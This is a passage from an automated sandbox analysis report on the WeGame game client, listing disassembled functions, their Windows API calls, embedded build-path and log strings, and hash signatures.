                                                                • Instruction Fuzzy Hash: FA11E531A00218B7DB15FAA6D802EDE77A8AF50B14F54815FB504A7182DFB8AE0583DD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004611A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004611AF
                                                                  • Part of subcall function 0045DC75: __EH_prolog3_GS.LIBCMT ref: 0045DC7F
                                                                  • Part of subcall function 0045DC75: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0045DCF9
                                                                  • Part of subcall function 0045DC75: Process32First.KERNEL32(00000000,?), ref: 0045DD1B
                                                                  • Part of subcall function 0045DC75: memset.VCRUNTIME140(?,00000000,00000410), ref: 0045DD2F
                                                                  • Part of subcall function 0045DC75: OpenProcess.KERNEL32(00000411,00000000,?), ref: 0045DD52
                                                                  • Part of subcall function 0045DC75: GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0045DD71
                                                                  • Part of subcall function 0045DC75: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045DDA8
                                                                  • Part of subcall function 0045DC75: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?), ref: 0045DE0B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000058,00460569), ref: 004611D1
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004611F5
                                                                • [main]assistant is running, exit, xrefs: 00461211
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_memset$?get_log_instance@base@@CreateFileFirstH_prolog3Logger@1@ModuleNameOpenProcessProcess32SimpleSnapshotString::operator=Toolhelp32
                                                                • String ID: [main]assistant is running, exit$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1363618106-3725917969
                                                                • Opcode ID: c4e37a55e715fb37885c3abe7d9ce2f7d989899318352fd337fc01b6220b05cd
                                                                • Instruction ID: 40f0c79e1b7c64e562d594947099563c805c59f34e84ab2a9a8826cd70ba6b83
                                                                • Opcode Fuzzy Hash: c4e37a55e715fb37885c3abe7d9ce2f7d989899318352fd337fc01b6220b05cd
                                                                • Instruction Fuzzy Hash: 2C019E31D00308ABCB10EB91D856BAE73B4AF11719F20454BE4117B1D1EB6CA905CB4E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD474AD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD474B4
                                                                  • Part of subcall function 6BD4511D: __EH_prolog3.LIBCMT ref: 6BD45124
                                                                  • Part of subcall function 6BD49842: __EH_prolog3_GS.LIBCMT ref: 6BD49849
                                                                Strings
                                                                • No such node, xrefs: 6BD474F2
                                                                • e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 6BD47519
                                                                • class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha, xrefs: 6BD4751E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$H_prolog3
                                                                • String ID: No such node$class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha$e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp
                                                                • API String ID: 3952504126-2268865274
                                                                • Opcode ID: b65f9a0f305e278523847130f02e896607174fc4a110c07881af26fd3c6c4ea4
                                                                • Instruction ID: 0333a3e54596902325d15c3e41da0c0f1ef64e487f0d5ab2270026d2e69db409
                                                                • Opcode Fuzzy Hash: b65f9a0f305e278523847130f02e896607174fc4a110c07881af26fd3c6c4ea4
                                                                • Instruction Fuzzy Hash: A401D132821069EBCB19DBB4C906EEDBB346F20728F040158A101BB190DB3C9B09C7A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9AAA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9AAA7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050), ref: 6BD9AAAE
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                Strings
                                                                • [Qos_http_handler] OnEnd., xrefs: 6BD9AAEE
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9AAD2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@
                                                                • String ID: [Qos_http_handler] OnEnd.$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                                                • API String ID: 52498757-3997266839
                                                                • Opcode ID: f4415daa465c11b707ce23ce9fc61b8c1ac18678bb102c9355312c53ffbc29b1
                                                                • Instruction ID: 86ffa9f0139dba760e8f3a4e8865a996896a2bec66a56e7673bd9507f4352118
                                                                • Opcode Fuzzy Hash: f4415daa465c11b707ce23ce9fc61b8c1ac18678bb102c9355312c53ffbc29b1
                                                                • Instruction Fuzzy Hash: 42F04932A416119BCB19E7B0A8A2B7D73625F90728F204158D4212F2D4CF3E8B0696A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004614BD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004614C4
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(0000001C,0045A0DB), ref: 004614C9
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?load_config@Component_mgr@common@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,Config\client_plugin_config.info,00000020,0000001C,0045A0DB), ref: 004614FD
                                                                Strings
                                                                • Config\client_plugin_config.info, xrefs: 004614DD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_comp_mgr_instance@common@ierd_tgp@@?load_config@Component_mgr@12@Component_mgr@common@ierd_tgp@@D@2@@std@@@D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@memmove
                                                                • String ID: Config\client_plugin_config.info
                                                                • API String ID: 716744841-3669469243
                                                                • Opcode ID: d584337a5eeb5edf0f890407885af1bb3da80313ef95a3be47d4ad4aba83ef24
                                                                • Instruction ID: d99be5ce0ca6cc0a5a8cc9384ad13a67375958eec1134ffc584925a3ebd67a06
                                                                • Opcode Fuzzy Hash: d584337a5eeb5edf0f890407885af1bb3da80313ef95a3be47d4ad4aba83ef24
                                                                • Instruction Fuzzy Hash: EDF03771E402099FDB14EFE6C4926EDFEB0AF04364F64156FE11577182EA384B4487AA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BF6FFA0 Relevance: 6.1, APIs: 4, Instructions: 76networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • connect.WS2_32(?,?,?), ref: 6BF6FFCC
                                                                • WSAGetLastError.WS2_32 ref: 6BF6FFDA
                                                                • select.WS2_32(?,00000000,?,00000001,00000000), ref: 6BF7006E
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 6BF70080
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastconnectselect
                                                                • String ID:
                                                                • API String ID: 824528150-0
                                                                • Opcode ID: b4a6bfd0da5fbeea6d30270a62fb131640a795db464e89337eda46db9088f1b7
                                                                • Instruction ID: 934b4cb60c9bfb8c4fad186a158e778431e18f8ad2c1d6b178eb187a1831289f
                                                                • Opcode Fuzzy Hash: b4a6bfd0da5fbeea6d30270a62fb131640a795db464e89337eda46db9088f1b7
                                                                • Instruction Fuzzy Hash: 4721D6736142445BD738EF38D855BEEB7E8AF89310F504A7FA059C61E0EBB8D5048792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9A6CA Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD9A6D1
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9A6EC
                                                                  • Part of subcall function 6BD31899: _Mtx_lock.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318A0
                                                                  • Part of subcall function 6BD31899: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318AD
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9A700
                                                                  • Part of subcall function 6BD318B8: _Mtx_unlock.MSVCP140(?,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318BF
                                                                  • Part of subcall function 6BD318B8: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318CC
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9A779
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Cnd_initstd::_$C_error@std@@Throw_$H_prolog3Mtx_lockMtx_unlock
                                                                • String ID:
                                                                • API String ID: 3974313008-0
                                                                • Opcode ID: f5d5eb99e8cf7c24033301babf093d5efa5fc957011aaf7b5242dc6efeb49420
                                                                • Instruction ID: fe2980e7296e8a1e2366912e5720ec76cbabfb5a795cc012e571b4120c9f727e
                                                                • Opcode Fuzzy Hash: f5d5eb99e8cf7c24033301babf093d5efa5fc957011aaf7b5242dc6efeb49420
                                                                • Instruction Fuzzy Hash: C7219F31905256DAEF05DBB894427EDBBB4AF05324F204158D515EF2C1CB7C4B04DB76
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00443557 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0044355E
                                                                • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0044352D,?,?,?,00000008,00000004,0046A12F,?,00000020,00000040,00000001,?,85A35C35), ref: 0044357B
                                                                • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000008,0044352D,?,?,?,00000008,00000004,0046A12F,?,00000020,00000040,00000001,?), ref: 00443593
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,?,?,00000000,?,?,?,?,?,0047B8A9,000000FF), ref: 004435E6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@?setstate@?$basic_ios@D@std@@@1@_H_prolog3V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 3697353692-0
                                                                • Opcode ID: 1cba3a43b7cf6df5976d853b9c4ffba6c12c8f16bbc386da8ba154352ec62fee
                                                                • Instruction ID: 102615187c4410a349a553e7e2e822658e7fe3353ad1143197363b721627864b
                                                                • Opcode Fuzzy Hash: 1cba3a43b7cf6df5976d853b9c4ffba6c12c8f16bbc386da8ba154352ec62fee
                                                                • Instruction Fuzzy Hash: AA118F74600206EFDB04DF69C889AAEBBB5FF44304F10815EF8159B381DB74DA51CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD448C4 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD448CB
                                                                • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6BD447F7,?,?,?,0000000F,00000004,6BD4A69E,?,00000020,00000040,00000001,?,?,?,?), ref: 6BD448E8
                                                                • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000005,00000000,00000000,00000008,6BD447F7,?,?,?,0000000F,00000004,6BD4A69E,?,00000020,00000040,00000001,?), ref: 6BD44900
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000008,?,?,00000000), ref: 6BD44953
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@?setstate@?$basic_ios@D@std@@@1@_H_prolog3V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 3697353692-0
                                                                • Opcode ID: d0a5cb4a28130304764a6daf00a8e07480ea2b12361d69007438ab561fccf194
                                                                • Instruction ID: 92a01f03e642162fd680dac8f23fb8f4d8943f5240933b7e3435b380835aa885
                                                                • Opcode Fuzzy Hash: d0a5cb4a28130304764a6daf00a8e07480ea2b12361d69007438ab561fccf194
                                                                • Instruction Fuzzy Hash: B4119A7461020AEFDB05DF68C888AADBBB5FF04304F20401DE8159B391CB75EA26DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046E3BC Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3C4
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C404,?), ref: 0046F6E1
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C43C,?), ref: 0046F6FE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                • String ID:
                                                                • API String ID: 4113974480-0
                                                                • Opcode ID: aa1518e86f42f69b3abb8eb3fdf22dfdf4d5d5b7cd22746973db42aad26a13c3
                                                                • Instruction ID: e97731d975b648c53d0edfc182754a1827ccfc775e27ff8943e0ee96539cb342
                                                                • Opcode Fuzzy Hash: aa1518e86f42f69b3abb8eb3fdf22dfdf4d5d5b7cd22746973db42aad26a13c3
                                                                • Instruction Fuzzy Hash: EDF0BB3540020C768F04B66BF8569AD376C5A00714B50823BFC69921F2FB7CD55E85DF
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE22DCC Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DD4
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                • _CxxThrowException.VCRUNTIME140(?,6C06260C), ref: 6BE2482D
                                                                • _CxxThrowException.VCRUNTIME140(?,6C062628), ref: 6BE2484A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                • String ID:
                                                                • API String ID: 4113974480-0
                                                                • Opcode ID: 7a78846d9bd15ba0aba217c6933465fe683f2373d6af9eea76af29276a4d2c65
                                                                • Instruction ID: b41b05506f2b657bfd68ec2f44feedcfbcae505c2e06ba56434db74a0296e895
                                                                • Opcode Fuzzy Hash: 7a78846d9bd15ba0aba217c6933465fe683f2373d6af9eea76af29276a4d2c65
                                                                • Instruction Fuzzy Hash: EDF0E93680420D77DB04AAF4EC4599D377C4910698F604571BD24D18F0FF78D65AC5D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043DDA0 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043DDA7
                                                                • ??0CThread@@QAE@XZ.COMMON(00000024), ref: 0043DDB4
                                                                • ?appdata_project_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0043DDDE
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0043DDFA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?appdata_project_folder@File_info@common@ierd_tgp@@H_prolog3_SimpleString::operator=Thread@@Vpath@filesystem@3@
                                                                • String ID:
                                                                • API String ID: 2304671556-0
                                                                • Opcode ID: 4ac6bbc186760c077c95b5b5302abb81f627a114b73e2a8fa4909bfc9a05ead2
                                                                • Instruction ID: ad07847824c5ca77c544a9ea259c026e02e2b8358e2c92397122f82973ff6107
